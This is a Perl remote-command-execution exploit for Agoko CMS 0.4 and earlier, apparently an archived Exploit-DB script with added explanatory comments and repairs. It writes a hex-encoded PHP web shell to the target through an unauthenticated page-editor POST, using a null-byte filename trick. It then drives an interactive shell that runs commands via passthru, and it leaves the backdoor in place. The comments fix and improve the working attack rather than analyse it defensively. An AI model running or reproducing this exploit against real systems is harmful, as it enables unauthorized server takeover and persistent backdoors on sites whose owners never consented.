
# Title : Agoko CMS <= 0.4 Remote Command Execution Exploit
# Published : 2009-09-09
# Author : StAkeR


#!/usr/bin/perl

# Usage banner.  Printed unconditionally, before the arguments are looked at,
# so a bare invocation still shows how to call the script.  The leading "\n"
# and the trailing blank line reproduce the original q~...~ literal exactly.
print "\n", <<'USAGE';
--------------------------------------------------
Agoko CMS <= 0.4 remote commands execution exploit
by staker
mail: staker[at]hotmail[dot]it
--------------------------------------------------

[*] Usage   -> perl [xpl.pl] [host] [path]
[*] Example -> perl agk.pl localhost /Agoko

USAGE

         
#>-----------<#
#>- Working -<#
#>-----------<#########################################
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #
#                                                     #
# --------------------------------------------------  #
# Agoko CMS <= 0.4 remote commands execution exploit  #
# by staker                                           #
# mail: staker[at]hotmail[dot]it                      #
# --------------------------------------------------  #
#                                                     #
# [*] Usage   -> perl [xpl.pl] [host] [path]          #
# [*] Example -> perl agk.pl localhost /Agoko         #
#                                                     #
# shell already exists.                               #
#                                                     #
# Agoko[shell]:~$ uname -n -r                         #
#                                                     #
# death 2.6.27-7-generic                              #
#######################################################


use IO::Socket;
use LWP::Simple;


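# --- entry point ---------------------------------------------------------
# argv[0] = target host (name or IP; give_kt() dials TCP/80 unless told
#           otherwise), argv[1] = web path of the Agoko install.
my $host = shift;
my $path = shift;

# Both arguments are mandatory.  The usage banner has already been printed,
# so just refuse to go on -- but with a non-zero status, so a calling shell
# can tell a bad invocation from a clean run (the original exited 0 here).
unless (defined $host && length $host && defined $path && length $path) {
    print STDERR "[-] host and path are both required.\n";
    exit(1);
}

# Normalise the web path.  The usage example passes "/Agoko" and every
# request below already prepends its own "/", which produced "//Agoko/..."
# request lines; strip surrounding slashes so the URLs are well-formed.
$path =~ s{^/+}{};
$path =~ s{/+$}{};

check_shell($host, $path);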


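# Probe the target for an already-planted backdoor before trying to write one.
#
# Requests /<path>/content/shell_vup.php with no ?cmd parameter.  The PHP stub
# that inject_shell() writes answers "bany wtf" in that case (its final die()),
# so that string is used as a liveness marker.  If it is seen, control goes
# straight to the interactive loop; otherwise the file-write attempt is made.
#
# Arguments: ($host, $path) -- target host and web path without surrounding
# slashes.  Dies with a descriptive message if either is missing (the original
# died with $!, which carries no OS error at that point).
# Returns nothing; hands over to load_cmd() or inject_shell().
#
# Note: the empty "()" prototype on the original sub was dropped.  Perl only
# honours it when the sub is declared before a call, but where it is honoured
# a two-argument call is a compile-time "Too many arguments" error.
sub check_shell {
    my ($host, $path) = @_;
    die "check_shell: host and path are required\n"
        unless defined $host && length $host && defined $path && length $path;

    # Minimal hand-built HTTP/1.1 request.  The CRLF escapes were lost in the
    # archived copy ("rn", and "$hostrn" interpolated as an undefined
    # variable); restored here, otherwise the request is malformed.
    # The static bany=love_me cookie is sent on every request; what Agoko does
    # with it is not visible from this script -- presumably nothing required.
    my $request = "GET /$path/content/shell_vup.php HTTP/1.1\r\n"
                . "Host: $host\r\n"
                . "Cookie: bany=love_me\r\n"
                . "User-Agent: Lynx (textmode)\r\n"
                . "Connection: close\r\n\r\n";

    my $response = give_kt($host, $request);

    if ($response =~ /bany wtf/i) {
        print "[*] shell already exists.\n";
        load_cmd($host, $path);
    }
    else {
        print "[*] exploiting..\n";
        inject_shell($host, $path);
    }
    return;
}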
                  

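# Write the PHP command stub to the target through the CMS page editor.
#
# One POST to /<path>/admintools/editpage-2.php, carrying the same static
# cookie as the probe request and nothing else by way of authentication: the
# write therefore relies on that editor being reachable without a session.
# On the CMS's own success message the interactive loop is started; on
# anything else the script dies.  The stub is never removed again -- there is
# no cleanup path anywhere in this script, so a successful run leaves an
# unauthenticated web shell at content/shell_vup.php on the target.
#
# Arguments: ($host, $path).  Returns nothing; dies on failure.
sub inject_shell {
    my ($host, $path) = @_;

    # The PHP stub, hex-encoded as in the original (the "\x" escapes had been
    # stripped in the archived copy and are restored here).  Decoded it reads:
    #   <?php error_reporting(E_ALL);
    #   if (isset($_GET['cmd'])) passthru(stripslashes($_GET['cmd']));
    #   else die("bany wtf"); ?>
    # The die() branch is the marker that check_shell() looks for.
    my $shell = "\x3C\x3F\x70\x68\x70\x20\x20\x20\x20\x20\x20\x65\x72\x72"
              . "\x6F\x72\x5F\x72\x65\x70\x6F\x72\x74\x69\x6E\x67\x28\x45"
              . "\x5F\x41\x4C\x4C\x29\x3B\x20\x20\x20\x20\x20\x20\x20\x20"
              . "\x20\x20\x20\x20\x69\x66\x20\x28\x69\x73\x73\x65\x74\x28"
              . "\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x29"
              . "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x61\x73\x73"
              . "\x74\x68\x72\x75\x28\x73\x74\x72\x69\x70\x73\x6C\x61\x73"
              . "\x68\x65\x73\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64"
              . "\x27\x5D\x29\x29\x3B\x20\x20\x20\x20\x20\x20\x65\x6C\x73"
              . "\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x65\x28"
              . "\x22\x62\x61\x6E\x79\x20\x77\x74\x66\x22\x29\x3B\x20\x20"
              . "\x20\x20\x20\x20\x3F\x3E\x20";

    # Form body for editpage-2.php.  The NUL after the filename is the
    # null-byte truncation trick: the editor presumably appends its own
    # suffix to the supplied name before writing, and a pre-5.3.4 PHP
    # filesystem call stops at the NUL -- the target code is not visible
    # here, so that is inferred from the payload, not verified.  Nothing in
    # the body is percent-encoded; this works only because the stub contains
    # no '&', '=' or '+' bytes, so the form parser still sees exactly the
    # three fields filename / text / Submit.
    my $data = "filename=shell_vup.php\x00&text=$shell&Submit=Speichern";

    # CRLF escapes restored as in check_shell().  Content-Length is in bytes;
    # the body is pure ASCII so length() is correct.
    my $request = "POST /$path/admintools/editpage-2.php HTTP/1.1\r\n"
                . "Host: $host\r\n"
                . "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"
                . "Cookie: bany=love_me\r\n"
                . "Content-Type: application/x-www-form-urlencoded\r\n"
                . "Content-Length: " . length($data) . "\r\n"
                . "Connection: close\r\n\r\n"
                . $data;

    # "erfolgreich eingetragen" is German for "successfully entered": the
    # CMS's own confirmation for a saved page ("Speichern" above = "Save").
    my $response = give_kt($host, $request);
    if ($response =~ /erfolgreich eingetragen/i) {
        load_cmd($host, $path);
    }
    else {
        die "[*] Exploit failed.\n";
    }
    return;
}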
   

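# Interactive pseudo-shell over the planted stub.
#
# Reads one command per line from STDIN, forwards it as the ?cmd= query
# parameter of /<path>/content/shell_vup.php and prints whatever comes back
# via LWP::Simple::getprint (raw body to STDOUT; no status code is checked).
# "exit", "quit" or "out" ends the session with status 0.  EOF on STDIN now
# ends it too -- the original chomp()ed an undefined read and spun forever.
#
# Arguments: ($host, $path).  Does not return on "exit"; returns normally
# only on EOF.
sub load_cmd {
    my ($host, $path) = @_;

    my $base = "http://$host/$path/content/shell_vup.php?cmd=";

    while (1) {
        print "\nAgoko[shell]:~\$ ";
        my $line = <STDIN>;
        last unless defined $line;               # EOF or closed pipe
        chomp $line;

        exit(0) if $line =~ /\A(?:exit|quit|out)+\z/i;

        # Percent-encode the command before it goes into the query string.
        # The original interpolated it raw, so '&', '#', ';', '+' and the like
        # were either swallowed by the URI parser or split the query -- e.g.
        # `ls; id` or `a && b` never reached passthru() intact.  RFC 3986
        # unreserved characters are left alone, everything else becomes %XX.
        (my $encoded = $line) =~ s/([^A-Za-z0-9_.~-])/sprintf('%%%02X', ord $1)/ge;

        getprint($base . $encoded);
    }
    return;
}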
          
         
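# Send one raw HTTP request over a plain TCP socket and return the complete
# response (status line, headers and body) as a single string.
#
# Arguments:
#   $target  - host name or IP to connect to
#   $request - full request text including the terminating blank line; it
#              must carry "Connection: close", because the reply is read
#              until the peer closes the socket
#   $port    - optional TCP port, default 80.  New parameter; two-argument
#              callers behave exactly as before.
# Returns the raw response, '' if the peer sent nothing (the original
# returned undef in that case, which made the callers' regex match warn).
# Dies if an argument is missing, the connect fails, or the write fails.
# Plain TCP only: an https:// target cannot be reached this way.
sub give_kt {
    my ($target, $request, $port) = @_;
    $port = 80 unless defined $port;

    die "give_kt: target host is required\n"  unless defined $target  && length $target;
    die "give_kt: request text is required\n" unless defined $request && length $request;

    # IO::Socket reports connect failures in $@, not $!; the original
    # printed $! here, which is frequently empty or stale.
    my $sock = IO::Socket::INET->new(
        PeerAddr => $target,
        PeerPort => $port,
        Proto    => 'tcp',
    ) or die "give_kt: connect to $target:$port failed: $@\n";

    # print() on the handle instead of an unchecked send(): it loops on
    # short writes and its failure is detectable.  IO::Socket turns
    # autoflush on for the handle, so the request leaves immediately.
    print {$sock} $request
        or die "give_kt: write to $target:$port failed: $!\n";

    my $response = '';
    while (my $chunk = <$sock>) {
        $response .= $chunk;
    }
    close $sock;

    return $response;
}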
